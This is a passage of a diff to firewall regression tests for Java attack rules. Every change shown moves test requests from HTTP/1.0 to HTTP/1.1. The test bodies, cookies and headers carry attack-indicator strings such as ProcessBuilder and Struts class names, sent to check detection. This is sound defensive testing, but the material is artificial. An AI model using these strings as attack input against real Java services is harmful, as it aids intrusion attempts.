@@ -2484,7 +2484,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2510,7 +2510,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2536,7 +2536,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2562,7 +2562,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2588,7 +2588,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.whileclosure"
         output:
           log:
@@ -2608,7 +2608,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "ProcessBuilder.evil.whileclosure=test"
         output:
           log:
@@ -2629,7 +2629,7 @@ tests:
             Cookie: test=ProcessBuilder.evil.whileclosure
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2650,7 +2650,7 @@ tests:
             Cookie: ProcessBuilder.evil.whileclosure=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2671,7 +2671,7 @@ tests:
             test: ProcessBuilder.evil.whileclosure
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2691,7 +2691,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><ProcessBuilder.evil.whileclosure attribute_name=\"attribute_value\">value</ProcessBuilder.evil.whileclosure></xml>"
         output:
           log:
@@ -2711,7 +2711,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element ProcessBuilder.evil.whileclosure=\"attribute_value\">element_value</element></xml>"
         output:
           log:
@@ -2731,7 +2731,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.whileclosure\">element_value</element></xml>"
         output:
           log:
@@ -2751,7 +2751,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">ProcessBuilder.evil.whileclosure</element></xml>"
         output:
           log:
@@ -2771,7 +2771,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">ProcessBuilder.evil.whileclosure</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2791,7 +2791,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=ProcessBuilder.evil.whileclosure"
         output:
           log:
@@ -2811,7 +2811,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             {"test": "ProcessBuilder.evil.whileclosure"}
         output:
@@ -2832,7 +2832,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             {"ProcessBuilder.evil.whileclosure": "test"}
         output:
@@ -2853,7 +2853,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2879,7 +2879,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2905,7 +2905,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
@@ -2931,7 +2931,7 @@ tests:
             Content-Type: "multipart/form-data; boundary=---------------------------thisissparta"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: |
             -----------------------------thisissparta
             Content-Disposition: form-data; name="payload"
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
index b08f7b265..0df6b9d7e 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml
@@ -18,7 +18,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=com.opensymphony.xwork2"
         output:
           log:
@@ -38,7 +38,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "com.opensymphony.xwork2=test"
         output:
           log:
@@ -59,7 +59,7 @@ tests:
             Cookie: test=com.opensymphony.xwork2
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -80,7 +80,7 @@ tests:
             Cookie: com.opensymphony.xwork2=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -101,7 +101,7 @@ tests:
             test: com.opensymphony.xwork2
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -121,7 +121,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"com.opensymphony.xwork2\">element_value</element></xml>"
         output:
           log:
@@ -141,7 +141,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">com.opensymphony.xwork2</element></xml>"
         output:
           log:
@@ -161,7 +161,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">com.opensymphony.xwork2</element></l3></l2></l1></xml>"
         output:
           log:
@@ -181,7 +181,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=com.opensymphony.xwork2"
         output:
           log:
@@ -201,7 +201,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"com.opensymphony.xwork2\"}"
         output:
           log:
@@ -221,7 +221,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"com.opensymphony.xwork2\": \"test\"}"
         output:
           log:
@@ -241,7 +241,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=com.sun.org.apache"
         output:
           log:
@@ -261,7 +261,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "com.sun.org.apache=test"
         output:
           log:
@@ -282,7 +282,7 @@ tests:
             Cookie: test=com.sun.org.apache
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -303,7 +303,7 @@ tests:
             Cookie: com.sun.org.apache=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -324,7 +324,7 @@ tests:
             test: com.sun.org.apache
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -344,7 +344,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"com.sun.org.apache\">element_value</element></xml>"
         output:
           log:
@@ -364,7 +364,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">com.sun.org.apache</element></xml>"
         output:
           log:
@@ -384,7 +384,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">com.sun.org.apache</element></l3></l2></l1></xml>"
         output:
           log:
@@ -404,7 +404,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=com.sun.org.apache"
         output:
           log:
@@ -424,7 +424,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"com.sun.org.apache\"}"
         output:
           log:
@@ -444,7 +444,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"com.sun.org.apache\": \"test\"}"
         output:
           log:
@@ -464,7 +464,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.BufferedInputStream"
         output:
           log:
@@ -484,7 +484,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.BufferedInputStream=test"
         output:
           log:
@@ -505,7 +505,7 @@ tests:
             Cookie: test=java.io.BufferedInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -526,7 +526,7 @@ tests:
             Cookie: java.io.BufferedInputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -547,7 +547,7 @@ tests:
             test: java.io.BufferedInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -567,7 +567,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.BufferedInputStream\">element_value</element></xml>"
         output:
           log:
@@ -587,7 +587,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.BufferedInputStream</element></xml>"
         output:
           log:
@@ -607,7 +607,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.BufferedInputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -627,7 +627,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.BufferedInputStream"
         output:
           log:
@@ -647,7 +647,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.BufferedInputStream\"}"
         output:
           log:
@@ -667,7 +667,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.BufferedInputStream\": \"test\"}"
         output:
           log:
@@ -687,7 +687,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.BufferedReader"
         output:
           log:
@@ -707,7 +707,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.BufferedReader=test"
         output:
           log:
@@ -728,7 +728,7 @@ tests:
             Cookie: test=java.io.BufferedReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -749,7 +749,7 @@ tests:
             Cookie: java.io.BufferedReader=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -770,7 +770,7 @@ tests:
             test: java.io.BufferedReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -790,7 +790,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.BufferedReader\">element_value</element></xml>"
         output:
           log:
@@ -810,7 +810,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.BufferedReader</element></xml>"
         output:
           log:
@@ -830,7 +830,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.BufferedReader</element></l3></l2></l1></xml>"
         output:
           log:
@@ -850,7 +850,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.BufferedReader"
         output:
           log:
@@ -870,7 +870,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.BufferedReader\"}"
         output:
           log:
@@ -890,7 +890,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.BufferedReader\": \"test\"}"
         output:
           log:
@@ -910,7 +910,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.ByteArrayInputStream"
         output:
           log:
@@ -930,7 +930,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.ByteArrayInputStream=test"
         output:
           log:
@@ -951,7 +951,7 @@ tests:
             Cookie: test=java.io.ByteArrayInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -972,7 +972,7 @@ tests:
             Cookie: java.io.ByteArrayInputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -993,7 +993,7 @@ tests:
             test: java.io.ByteArrayInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1013,7 +1013,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.ByteArrayInputStream\">element_value</element></xml>"
         output:
           log:
@@ -1033,7 +1033,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.ByteArrayInputStream</element></xml>"
         output:
           log:
@@ -1053,7 +1053,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.ByteArrayInputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1073,7 +1073,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.ByteArrayInputStream"
         output:
           log:
@@ -1093,7 +1093,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.ByteArrayInputStream\"}"
         output:
           log:
@@ -1113,7 +1113,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.ByteArrayInputStream\": \"test\"}"
         output:
           log:
@@ -1133,7 +1133,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.ByteArrayOutputStream"
         output:
           log:
@@ -1153,7 +1153,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.ByteArrayOutputStream=test"
         output:
           log:
@@ -1174,7 +1174,7 @@ tests:
             Cookie: test=java.io.ByteArrayOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1195,7 +1195,7 @@ tests:
             Cookie: java.io.ByteArrayOutputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1216,7 +1216,7 @@ tests:
             test: java.io.ByteArrayOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1236,7 +1236,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.ByteArrayOutputStream\">element_value</element></xml>"
         output:
           log:
@@ -1256,7 +1256,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.ByteArrayOutputStream</element></xml>"
         output:
           log:
@@ -1276,7 +1276,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.ByteArrayOutputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1296,7 +1296,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.ByteArrayOutputStream"
         output:
           log:
@@ -1316,7 +1316,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.ByteArrayOutputStream\"}"
         output:
           log:
@@ -1336,7 +1336,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.ByteArrayOutputStream\": \"test\"}"
         output:
           log:
@@ -1356,7 +1356,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.CharArrayReader"
         output:
           log:
@@ -1376,7 +1376,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.CharArrayReader=test"
         output:
           log:
@@ -1397,7 +1397,7 @@ tests:
             Cookie: test=java.io.CharArrayReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1418,7 +1418,7 @@ tests:
             Cookie: java.io.CharArrayReader=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1439,7 +1439,7 @@ tests:
             test: java.io.CharArrayReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1459,7 +1459,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.CharArrayReader\">element_value</element></xml>"
         output:
           log:
@@ -1479,7 +1479,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.CharArrayReader</element></xml>"
         output:
           log:
@@ -1499,7 +1499,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.CharArrayReader</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1519,7 +1519,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.CharArrayReader"
         output:
           log:
@@ -1539,7 +1539,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.CharArrayReader\"}"
         output:
           log:
@@ -1559,7 +1559,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.CharArrayReader\": \"test\"}"
         output:
           log:
@@ -1579,7 +1579,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.DataInputStream"
         output:
           log:
@@ -1599,7 +1599,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.DataInputStream=test"
         output:
           log:
@@ -1620,7 +1620,7 @@ tests:
             Cookie: test=java.io.DataInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1641,7 +1641,7 @@ tests:
             Cookie: java.io.DataInputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1662,7 +1662,7 @@ tests:
             test: java.io.DataInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1682,7 +1682,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.DataInputStream\">element_value</element></xml>"
         output:
           log:
@@ -1702,7 +1702,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.DataInputStream</element></xml>"
         output:
           log:
@@ -1722,7 +1722,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.DataInputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1742,7 +1742,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.DataInputStream"
         output:
           log:
@@ -1762,7 +1762,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.DataInputStream\"}"
         output:
           log:
@@ -1782,7 +1782,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.DataInputStream\": \"test\"}"
         output:
           log:
@@ -1802,7 +1802,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.File"
         output:
           log:
@@ -1822,7 +1822,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.File=test"
         output:
           log:
@@ -1843,7 +1843,7 @@ tests:
             Cookie: test=java.io.File
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1864,7 +1864,7 @@ tests:
             Cookie: java.io.File=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1885,7 +1885,7 @@ tests:
             test: java.io.File
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -1905,7 +1905,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.File\">element_value</element></xml>"
         output:
           log:
@@ -1925,7 +1925,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.File</element></xml>"
         output:
           log:
@@ -1945,7 +1945,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.File</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1965,7 +1965,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.File"
         output:
           log:
@@ -1985,7 +1985,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
